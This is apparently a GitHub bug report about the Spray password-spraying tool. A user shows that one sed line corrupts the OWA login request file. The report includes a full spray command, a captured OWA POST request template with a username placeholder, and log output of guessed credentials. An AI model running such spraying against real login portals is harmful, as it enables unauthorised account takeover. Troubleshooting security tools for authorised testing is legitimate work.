You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I'm attempting to spray an OWA instance I know should contain some hits, but after letting a spray job run overnight it had gone through a decent chunk of the password list and found nothing which I thought was odd since this was against a userlist of 600+. I noticed that the spray-logs.txt file had a very large number in front of each attempt, which didn't match up with what I'd expect the byte size of a failed attempt to be. I double checked the post request file to make sure I didn't mess something up, and noticed that the IP in the host header was missing some digits. At first I thought I must have screwed it up when I pasted that data in from Burp, but then I realized every line had some characters chopped off the end. I set up a new spray to replicate the issue and verified that once the tool starts running, it is editing the supplied post request file in a way that mangles the attack. I redacted the actual IP and domain I was testing against, but you can see below that the post request looks correct before I start, and when checked after the attack is running it is missing the last character of every line.
root@kali:~# cat owa-post-request.txt
POST /owa/auth.owa HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://1.1.1.1/owa/auth/logon.aspx?replaceCurrent=1&reason=2&url=https%3a%2f%2f1.1.1.1%2fowa
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Connection: close
Cookie: ClientId=LLDFBDMQA0OGJRADTIGW; PrivateComputer=true; PBack=0
Upgrade-Insecure-Requests: 1
destination=https%3A%2F%2F1.1.1.1%2Fowa&flags=4&forcedownlevel=0&username=§sprayuser§%40redacted.org&password=spraypassword&passwordText=&isUtf8=1
root@kali:~# spray -owa "https://1.1.1.1/owa/auth/logon.aspx?replaceCurrent=1&reason=2&url=https%3a%2f%2f1.1.1.1%2fowa" test-users.txt /opt/Spray/passwords-English.txt 2 35 owa-post-request.txt &
[1] 910149
root@kali:~#
Spray 2.1 the Password Sprayer by Jacob Wilkin(Greenwolf)
11:38:35 Spraying with password: Users Username
11:38:36 Spraying with password: RedactedOrgName1
cat: logs/usernamestoremove.txt: No such file or directory
rm: cannot remove 'logs/usernamestoremove.txt': No such file or directory
root@kali:~# tail logs/spray-logs.txt
56468 joe.shmoe%joe.shmoe
56468 example.person%example.person
56468 abraham.lincoln%abraham.lincoln
56468 singleword%singleword
56468 joe.shmoe%Unity1
56468 example.person%Unity1
56468 abraham.lincoln%Unity1
56468 singleword%Unity1
root@kali:~# cat owa-post-request.txt
POST /owa/auth.owa HTTP/1.
Host: 1.1.1.
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.
Accept-Language: en-US,en;q=0.
Accept-Encoding: gzip, deflat
Referer: https://1.1.1.1/owa/auth/logon.aspx?replaceCurrent=1&reason=2&url=https%3a%2f%2f1.1.1.1%2fow
Content-Type: application/x-www-form-urlencode
Content-Length: 15
Connection: clos
Cookie: ClientId=LLDFBDMQA0OGJRADTIGW; PrivateComputer=true; PBack=
Upgrade-Insecure-Requests:
destination=https%3A%2F%2F1.1.1.1%2Fowa&flags=4&forcedownlevel=0&username=§sprayuser§%40redacted.org&password=spraypassword&passwordText=&isUtf8=
root@kali:~#
The text was updated successfully, but these errors were encountered:
I commented out line 177 sed -i.bak 's/.$//' $postrequest which seemed to be the culprit for cutting the last character off every line, but I'm still getting way different response sizes than I see in Burp. Not sure if the issue is solved.
I'm attempting to spray an OWA instance I know should contain some hits, but after letting a spray job run overnight it had gone through a decent chunk of the password list and found nothing which I thought was odd since this was against a userlist of 600+. I noticed that the spray-logs.txt file had a very large number in front of each attempt, which didn't match up with what I'd expect the byte size of a failed attempt to be. I double checked the post request file to make sure I didn't mess something up, and noticed that the IP in the host header was missing some digits. At first I thought I must have screwed it up when I pasted that data in from Burp, but then I realized every line had some characters chopped off the end. I set up a new spray to replicate the issue and verified that once the tool starts running, it is editing the supplied post request file in a way that mangles the attack. I redacted the actual IP and domain I was testing against, but you can see below that the post request looks correct before I start, and when checked after the attack is running it is missing the last character of every line.
The text was updated successfully, but these errors were encountered: